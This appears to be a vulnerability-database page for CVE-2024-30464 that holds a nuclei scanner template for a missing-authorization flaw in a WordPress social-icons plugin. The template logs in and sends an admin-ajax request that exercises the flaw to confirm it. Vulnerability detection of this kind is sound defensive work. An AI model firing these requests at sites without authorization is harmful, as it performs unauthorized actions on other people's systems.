Lucene search
K

WPZOOM Social Icons Widget <= 4.2.15 - Missing Authorization

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 10 Views

WPZOOM Social Icons Widget and Block up to 4.2.15 have a missing authorization flaw.

Related
Refs
Code
id: CVE-2024-30464

info:
  name: WPZOOM Social Icons Widget <= 4.2.15 - Missing Authorization
  author: pussycat0x
  severity: medium
  description: |
    WPZOOM Social Icons Widget & Block versions up to 4.2.15 contain a missing authorization vulnerability caused by insufficient access control in the widget and block, letting attackers perform unauthorized actions, exploit requires no special conditions.
  impact: |
    Attackers can perform unauthorized actions, potentially leading to data tampering or privilege escalation.
  remediation: |
    Update to version 4.2.16 or later.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/social-icons-widget-by-wpzoom/social-icons-widget-block-by-wpzoom-4215-missing-authorization
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
    cvss-score: 4.3
    cve-id: CVE-2024-30464
    epss-score: 0.01517
    epss-percentile: 0.71483
    cwe-id: CWE-862
  metadata:
    verified: true
    max-request: 4
    vendor: wpzoom
    product: social-icons-widget-by-wpzoom
    framework: wordpress
    publicwww-query: "/plugins/social-icons-widget-by-wpzoom/"
  tags: cve,cve2024,wordpress,wp,wp-plugin,wpzoom,authenticated

variables:
  rand: "{{rand_int(10000, 99999)}}"

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/social-icons-widget-by-wpzoom/readme.txt"

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "compare_versions(version, '<= 4.2.15')"
        condition: and
        internal: true

    extractors:
      - type: regex
        part: body
        group: 1
        name: version
        regex:
          - 'Stable tag: ([0-9.]+)'
        internal: true

  - raw:
      - |
        GET /wp-login.php HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In&redirect_to=/wp-admin/&testcookie=1

      - |
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        X-Requested-With: XMLHttpRequest

        action=zoom_ajax_set_pointer_transient&transient_name={{rand}}&lifetime=3600

    redirects: true
    max-redirects: 3

    matchers:
      - type: dsl
        dsl:
          - 'status_code_3 == 200'
          - 'contains(body,"Done, transient is set") && contains(body,"success\":true")'
        condition: and
# digest: 4b0a00483046022100a0c96aa66d6e32deb7b393c7a78f27852b103e45ad28d099e6058812781fadfc022100c56ddc839d92f0bf693d2b2bd40e1f57db9e4d54d9c6fe2152a45af6447a185e:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

13 Mar 2026 18:23Current
7.1High risk
Vulners AI Score7.1
CVSS 3.15.4 - 8.8
EPSS0.01517
SSVC
10